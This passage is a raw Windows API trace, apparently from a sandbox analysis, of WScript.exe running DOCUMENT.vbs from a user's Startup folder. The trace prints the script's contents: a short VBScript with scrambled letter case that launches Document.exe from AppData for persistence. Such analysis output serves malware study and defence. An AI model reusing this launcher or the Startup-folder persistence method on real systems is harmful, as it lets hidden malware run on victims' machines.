dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) [0295.952] GetModuleHandleA (lpModuleName=0x0) returned 0xffe70000 [0295.952] GetModuleHandleA (lpModuleName=0x0) returned 0xffe70000 [0295.952] GetVersionExA (in: lpVersionInformation=0x2efd80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x4c1e50, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2efd80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0295.952] GetUserDefaultLCID () returned 0x409 [0295.953] CoInitialize (pvReserved=0x0) returned 0x0 [0297.300] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs\" " [0297.300] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs\" ") returned 129 [0297.314] GetCurrentThreadId () returned 0x56c [0297.314] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efac8 | out: phkResult=0x2efac8*=0x7c) returned 0x0 [0297.314] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efac0 | out: phkResult=0x2efac0*=0x80) returned 0x0 [0297.314] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2eedc8, lpData=0x2ef1d0, lpcbData=0x2eedc0*=0x400 | out: lpType=0x2eedc8*=0x0, lpData=0x2ef1d0*=0x67, lpcbData=0x2eedc0*=0x400) returned 0x2 [0297.315] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x2eedc8, lpData=0x2ef1d0, lpcbData=0x2eedc0*=0x400 | out: lpType=0x2eedc8*=0x0, lpData=0x2ef1d0*=0x67, lpcbData=0x2eedc0*=0x400) returned 0x2 [0297.315] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x2eedc8, lpData=0x2ef1d0, lpcbData=0x2eedc0*=0x400 | out: lpType=0x2eedc8*=0x0, lpData=0x2ef1d0*=0x67, lpcbData=0x2eedc0*=0x400) returned 0x2 [0297.315] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0297.861] RegCloseKey (hKey=0x80) returned 0x0 [0297.861] RegCloseKey (hKey=0x7c) returned 0x0 [0297.861] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7e0 | out: phkResult=0x2ef7e0*=0x7c) returned 0x0 [0297.861] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7d8 | out: phkResult=0x2ef7d8*=0x80) returned 0x0 [0297.861] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2eeae8, lpData=0x2eeef0, lpcbData=0x2eeae0*=0x400 | out: lpType=0x2eeae8*=0x0, lpData=0x2eeef0*=0x0, lpcbData=0x2eeae0*=0x400) returned 0x2 [0297.861] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2eeae8, lpData=0x2eeef0, lpcbData=0x2eeae0*=0x400 | out: lpType=0x2eeae8*=0x0, lpData=0x2eeef0*=0x0, lpcbData=0x2eeae0*=0x400) returned 0x2 [0297.861] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2eeae8, lpData=0x2eeef0, lpcbData=0x2eeae0*=0x400 | out: lpType=0x2eeae8*=0x0, lpData=0x2eeef0*=0x0, lpcbData=0x2eeae0*=0x400) returned 0x2 [0297.861] RegCloseKey (hKey=0x80) returned 0x0 [0297.861] RegCloseKey (hKey=0x7c) returned 0x0 [0297.861] GetACP () returned 0x4e4 [0297.861] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77200000 [0297.862] GetProcAddress (hModule=0x77200000, lpProcName="HeapSetInformation") returned 0x7721c4a0 [0297.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.862] FreeLibrary (hLibModule=0x77200000) returned 1 [0297.862] CoRegisterMessageFilter (in: lpMessageFilter=0x445f30, lplpMessageFilter=0x445f40 | out: lplpMessageFilter=0x445f40*=0x0) returned 0x0 [0297.862] GetModuleFileNameW (in: hModule=0xffe70000, lpFilename=0x2efb20, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f [0297.863] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x2ef470 | out: lpdwHandle=0x2ef470) returned 0x704 [0297.863] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2eed60 | out: lpData=0x2eed60) returned 1 [0297.863] VerQueryValueW (in: pBlock=0x2eed60, lpSubBlock="\\", lplpBuffer=0x2ef478, puLen=0x2ef474 | out: lplpBuffer=0x2ef478*=0x2eed88, puLen=0x2ef474) returned 1 [0297.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef4c8 | out: phkResult=0x2ef4c8*=0x7c) returned 0x0 [0297.863] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2ee818, lpData=0x2eec20, lpcbData=0x2ee810*=0x400 | out: lpType=0x2ee818*=0x0, lpData=0x2eec20*=0x0, lpcbData=0x2ee810*=0x400) returned 0x2 [0297.863] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef480 | out: phkResult=0x2ef480*=0x80) returned 0x0 [0297.863] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ef444, lpData=0x2ef4c0, lpcbData=0x2ef440*=0x4 | out: lpType=0x2ef444*=0x0, lpData=0x2ef4c0*=0xf0, lpcbData=0x2ef440*=0x4) returned 0x2 [0297.863] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ee818, lpData=0x2eec20, lpcbData=0x2ee810*=0x400 | out: lpType=0x2ee818*=0x0, lpData=0x2eec20*=0x0, lpcbData=0x2ee810*=0x400) returned 0x2 [0297.863] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ef444, lpData=0x2ef4c0, lpcbData=0x2ef440*=0x4 | out: lpType=0x2ef444*=0x0, lpData=0x2ef4c0*=0xf0, lpcbData=0x2ef440*=0x4) returned 0x2 [0297.863] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ee818, lpData=0x2eec20, lpcbData=0x2ee810*=0x400 | out: lpType=0x2ee818*=0x1, lpData="1", lpcbData=0x2ee810*=0x4) returned 0x0 [0297.863] lstrlenW (lpString="1") returned 1 [0297.863] lstrlenW (lpString="0") returned 1 [0297.863] lstrlenW (lpString="1") returned 1 [0297.863] lstrlenW (lpString="no") returned 2 [0297.864] lstrlenW (lpString="1") returned 1 [0297.864] lstrlenW (lpString="false") returned 5 [0297.864] RegCloseKey (hKey=0x80) returned 0x0 [0297.864] RegCloseKey (hKey=0x7c) returned 0x0 [0297.864] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ef4c8, lpdwDisposition=0x0 | out: phkResult=0x2ef4c8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0297.864] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ef464, lpData=0x2ef4c0, lpcbData=0x2ef460*=0x4 | out: lpType=0x2ef464*=0x0, lpData=0x2ef4c0*=0xf0, lpcbData=0x2ef460*=0x4) returned 0x2 [0297.864] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ee838, lpData=0x2eec40, lpcbData=0x2ee830*=0x400 | out: lpType=0x2ee838*=0x1, lpData="1", lpcbData=0x2ee830*=0x4) returned 0x0 [0297.864] lstrlenW (lpString="1") returned 1 [0297.864] lstrlenW (lpString="0") returned 1 [0297.864] lstrlenW (lpString="1") returned 1 [0297.864] lstrlenW (lpString="no") returned 2 [0297.864] lstrlenW (lpString="1") returned 1 [0297.864] lstrlenW (lpString="false") returned 5 [0297.864] RegCloseKey (hKey=0x7c) returned 0x0 [0297.864] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ef4c8, lpdwDisposition=0x0 | out: phkResult=0x2ef4c8*=0x7c, lpdwDisposition=0x0) returned 0x0 [0297.864] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ef464, lpData=0x2ef4c0, lpcbData=0x2ef460*=0x4 | out: lpType=0x2ef464*=0x0, lpData=0x2ef4c0*=0xf0, lpcbData=0x2ef460*=0x4) returned 0x2 [0297.864] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ee838, lpData=0x2eec40, lpcbData=0x2ee830*=0x400 | out: lpType=0x2ee838*=0x0, lpData=0x2eec40*=0x31, lpcbData=0x2ee830*=0x400) returned 0x2 [0297.864] RegCloseKey (hKey=0x7c) returned 0x0 [0297.864] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs") returned 92 [0297.864] lstrlenW (lpString="vbs") returned 3 [0297.864] lstrlenW (lpString="WSH") returned 3 [0297.865] LoadStringW (in: hInstance=0xffe70000, uID=0x9c5, lpBuffer=0x2edf30, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0297.865] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x2eef70*=0x0 | out: pptlib=0x2eef70*=0x4ed070) returned 0x0 [0297.871] ITypeLib:GetTypeInfoOfGuid (in: This=0x4ed070, guid=0xffe758f0, ppTInfo=0x2eef58 | out: ppTInfo=0x2eef58*=0x4ee448) returned 0x0 [0297.873] ITypeInfo:GetRefTypeOfImplType (in: This=0x4ee448, index=0xffffffff, pRefType=0x2eef50 | out: pRefType=0x2eef50*=0xfffffffe) returned 0x0 [0297.873] ITypeInfo:GetRefTypeInfo (in: This=0x4ee448, hreftype=0xfffffffe, ppTInfo=0xffe8f458 | out: ppTInfo=0xffe8f458*=0x4ee4a0) returned 0x0 [0297.873] IUnknown:Release (This=0x4ee448) returned 0x1 [0297.874] ITypeLib:GetTypeInfoOfGuid (in: This=0x4ed070, guid=0xffe75950, ppTInfo=0x2eef58 | out: ppTInfo=0x2eef58*=0x4ee4f8) returned 0x0 [0297.874] ITypeInfo:GetRefTypeOfImplType (in: This=0x4ee4f8, index=0xffffffff, pRefType=0x2eef50 | out: pRefType=0x2eef50*=0xfffffffe) returned 0x0 [0297.874] ITypeInfo:GetRefTypeInfo (in: This=0x4ee4f8, hreftype=0xfffffffe, ppTInfo=0xffe8f4d8 | out: ppTInfo=0xffe8f4d8*=0x4ee550) returned 0x0 [0297.874] IUnknown:Release (This=0x4ee4f8) returned 0x1 [0297.874] ITypeLib:GetTypeInfoOfGuid (in: This=0x4ed070, guid=0xffe75960, ppTInfo=0x2eef58 | out: ppTInfo=0x2eef58*=0x4ee5a8) returned 0x0 [0297.874] ITypeInfo:GetRefTypeOfImplType (in: This=0x4ee5a8, index=0xffffffff, pRefType=0x2eef50 | out: pRefType=0x2eef50*=0xfffffffe) returned 0x0 [0297.874] ITypeInfo:GetRefTypeInfo (in: This=0x4ee5a8, hreftype=0xfffffffe, ppTInfo=0xffe8f518 | out: ppTInfo=0xffe8f518*=0x4ee600) returned 0x0 [0297.874] IUnknown:Release (This=0x4ee5a8) returned 0x1 [0297.874] ITypeLib:GetTypeInfoOfGuid (in: This=0x4ed070, guid=0xffe75910, ppTInfo=0x2eef58 | out: ppTInfo=0x2eef58*=0x4ee658) returned 0x0 [0297.874] ITypeInfo:GetRefTypeOfImplType (in: This=0x4ee658, index=0xffffffff, pRefType=0x2eef50 | out: pRefType=0x2eef50*=0xfffffffe) returned 0x0 [0297.874] ITypeInfo:GetRefTypeInfo (in: This=0x4ee658, hreftype=0xfffffffe, ppTInfo=0xffe8f498 | out: ppTInfo=0xffe8f498*=0x4ee6b0) returned 0x0 [0297.874] IUnknown:Release (This=0x4ee658) returned 0x1 [0297.874] IUnknown:Release (This=0x4ed070) returned 0x4 [0297.874] GetCurrentThreadId () returned 0x56c [0297.874] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0297.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffe81cf8, lpParameter=0x445a50, dwCreationFlags=0x0, lpThreadId=0x445a78 | out: lpThreadId=0x445a78*=0x5d4) returned 0xd4 [0297.875] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ef1b0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0297.943] CloseHandle (hObject=0xcc) returned 1 [0297.943] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs", nBufferLength=0x104, lpBuffer=0x2ef240, lpFilePart=0x2ef230 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs", lpFilePart=0x2ef230*="DOCUMENT.vbs") returned 0x5c [0297.943] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee750 | out: phkResult=0x2ee750*=0xe6) returned 0x0 [0297.943] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ee700, lpData=0x2ee760, lpcbData=0x2ee704*=0x800 | out: lpType=0x2ee700*=0x1, lpData="VBSFile", lpcbData=0x2ee704*=0x10) returned 0x0 [0297.943] RegCloseKey (hKey=0xe6) returned 0x0 [0297.943] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee750 | out: phkResult=0x2ee750*=0xe6) returned 0x0 [0297.943] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ee700, lpData=0x2eefd0, lpcbData=0x2ee704*=0x200 | out: lpType=0x2ee700*=0x1, lpData="VBScript", lpcbData=0x2ee704*=0x12) returned 0x0 [0297.944] RegCloseKey (hKey=0xe6) returned 0x0 [0297.944] CLSIDFromString (in: lpsz="VBScript", pclsid=0x2eef48 | out: pclsid=0x2eef48*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0297.944] CoCreateInstance (in: rclsid=0x2eef48*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffe71800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2eef40 | out: ppv=0x2eef40*=0x4466f0) returned 0x0 [0298.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ed140 | out: lpSystemTimeAsFileTime=0x2ed140*(dwLowDateTime=0x74a14ba0, dwHighDateTime=0x1d474ea)) [0298.577] GetCurrentProcessId () returned 0x568 [0298.577] GetCurrentThreadId () returned 0x56c [0298.577] GetTickCount () returned 0x7213 [0298.577] QueryPerformanceCounter (in: lpPerformanceCount=0x2ed148 | out: lpPerformanceCount=0x2ed148*=1807331000000) returned 1 [0298.577] __dllonexit () returned 0x7fef77dbfc0 [0298.578] __dllonexit () returned 0x7fef77dbfa8 [0298.600] __dllonexit () returned 0x7fef77dbfd4 [0298.653] GetUserDefaultLCID () returned 0x409 [0298.653] GetVersion () returned 0x1db10106 [0298.805] GetUserDefaultLCID () returned 0x409 [0298.805] GetACP () returned 0x4e4 [0298.806] GetCurrentThreadId () returned 0x56c [0298.806] GetCurrentThreadId () returned 0x56c [0298.806] GetCurrentThreadId () returned 0x56c [0298.806] GetUserDefaultLCID () returned 0x409 [0298.806] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0298.806] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2eeea0, cchData=6 | out: lpLCData="1252") returned 5 [0298.807] IsValidCodePage (CodePage=0x4e4) returned 1 [0298.807] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe9f0000 [0299.372] GetProcAddress (hModule=0x7fefe9f0000, lpProcName="CoCreateInstance") returned 0x7fefea17490 [0299.372] CoCreateInstance (in: rclsid=0x7fef782d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef782d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x446a38 | out: ppv=0x446a38*=0x4f72c0) returned 0x0 [0299.372] IUnknown:AddRef (This=0x4f72c0) returned 0x2 [0299.372] GetCurrentProcessId () returned 0x568 [0299.372] GetCurrentThreadId () returned 0x56c [0299.372] GetTickCount () returned 0x752e [0299.372] ISystemDebugEventFire:BeginSession (This=0x4f72c0, guidSourceID=0x7fef782d5d8, strSessionName="VBScript:00001384:00001388:18029998") returned 0x0 [0299.372] GetCurrentThreadId () returned 0x56c [0299.373] GetCurrentThreadId () returned 0x56c [0299.373] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DOCUMENT.vbs" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\document.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x100 [0299.373] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0299.373] CreateFileMappingA (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8d, lpName=0x0) returned 0x104 [0299.373] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3f0000 [0299.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3f0000, cbMultiByte=141, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0299.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3f0000, cbMultiByte=141, lpWideCharStr=0x501528, cchWideChar=141 | out: lpWideCharStr="sET hqQTlNHTptCBUZVik = CreAtEOBJeCT(\"wsCripT.ShEll\")\r\nhQqtlnhtPTcbuzvIk.Run \"\"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"\"\"\r\n") returned 141 [0299.375] UnmapViewOfFile (lpBaseAddress=0x3f0000) returned 1 [0299.375] CloseHandle (hObject=0x104) returned 1 [0299.375] CloseHandle (hObject=0x100) returned 1 [0299.376] GetSystemDirectoryA (in: lpBuffer=0x2ef0c8, uSize=0x0 | out: lpBuffer="\x0cõ.") returned 0x14 [0299.376] GetSystemDirectoryA (in: lpBuffer=0x447040, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0299.376] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff080000 [0299.376] GetProcAddress (hModule=0x7feff080000, lpProcName="SaferIdentifyLevel") returned 0x7feff09e470 [0299.376] GetProcAddress (hModule=0x7feff080000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff09f9b0 [0299.376] GetProcAddress (hModule=0x7feff080000, lpProcName="SaferCloseLevel") returned 0x7feff09f660 [0299.376] IdentifyCodeAuthzLevelW () returned 0x1 [0304.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ee240 | out: lpSystemTimeAsFileTime=0x2ee240*(dwLowDateTime=0x781b8de0, dwHighDateTime=0x1d474ea)) [0304.599] GetCurrentProcessId () returned 0x568 [0304.599] GetCurrentThreadId () returned 0x56c [0304.599] GetTickCount () returned 0x88dd [0304.599] QueryPerformanceCounter (in: lpPerformanceCount=0x2ee248 | out: lpPerformanceCount=0x2ee248*=1807933200000) returned 1 [0304.599] GetVersionExA (in: lpVersionInformation=0x2ee020*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf732f810, dwBuildNumber=0x7fe, dwPlatformId=0xf7320000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2ee020*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0304.599] GetUserDefaultLCID () returned 0x409 [0304.599] IsFileSupportedName () returned 0x1 [0304.599] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0304.603] GetSignedDataMsg () returned 0x0 [0304.603] GetCurrentProcess () returned 0xffffffffffffffff [0304.603] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x104, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2ee880, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2ee880*=0x130) returned 1 [0304.603] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0304.603] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0304.603] ReadFile (in: hFile=0x130, lpBuffer=0x44a060, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x2ee860, lpOverlapped=0x0 | out: lpBuffer=0x44a060*, lpNumberOfBytesRead=0x2ee860*=0x8d, lpOverlapped=0x0) returned 1 [0304.603] CoInitialize (pvReserved=0x0) returned 0x1 [0304.603] CoCreateInstance (in: rclsid=0x7fef732f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef732f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x2ee7d0 | out: ppv=0x2ee7d0*=0x44a510) returned 0x0 [0306.179] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ec9d0 | out: lpSystemTimeAsFileTime=0x2ec9d0*(dwLowDateTime=0x78eaa580, dwHighDateTime=0x1d474ea)) [0306.179] GetCurrentProcessId () returned 0x568 [0306.179] GetCurrentThreadId () returned 0x56c [0306.179] GetTickCount () returned 0x8e2b [0306.179] QueryPerformanceCounter (in: lpPerformanceCount=0x2ec9d8 | out: lpPerformanceCount=0x2ec9d8*=1808091300000) returned 1 [0306.180] __dllonexit () returned 0x7fef5ec14c0 [0306.180] __dllonexit () returned 0x7fef5ec14e8 [0306.180] GetVersionExA (in: lpVersionInformation=0x2ec7b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf5ec2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf5ec14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2ec7b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0306.180] GetProcessWindowStation () returned 0x30 [0306.180] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x2ec798, nLength=0xc, lpnLengthNeeded=0x2ec790 | out: pvInfo=0x2ec798, lpnLengthNeeded=0x2ec790) returned 1 [0306.180] DllGetClassObject (in: rclsid=0x4fefb0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefeb76cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ed4a0 | out: ppv=0x2ed4a0*=0x4466d0) returned 0x0 [0306.181] IClassFactory:CreateInstance (in: This=0x4466d0, pUnkOuter=0x0, riid=0x2ee280*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2ed4c0 | out: ppvObject=0x2ed4c0*=0x44a510) returned 0x0 [0306.181] GetSystemInfo (in: lpSystemInfo=0x2ed300 | out: lpSystemInfo=0x2ed300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0306.181] VirtualQuery (in: lpAddress=0x2ed370, lpBuffer=0x2ed330, dwLength=0x30 | out: lpBuffer=0x2ed330*(BaseAddress=0x2ed000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0306.181] IUnknown:AddRef (This=0x44a510) returned 0x2 [0306.181] IUnknown:Release (This=0x44a510) returned 0x1 [0306.181] IUnknown:Release (This=0x4466d0) returned 0x0 [0306.181] IUnknown:QueryInterface (in: This=0x44a510, riid=0x7fef732f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2ee708 | out: ppvObject=0x2ee708*=0x44a510) returned 0x0 [0306.181] IUnknown:Release (This=0x44a510) returned 0x1 [0306.182] _strnicmp (_Str1="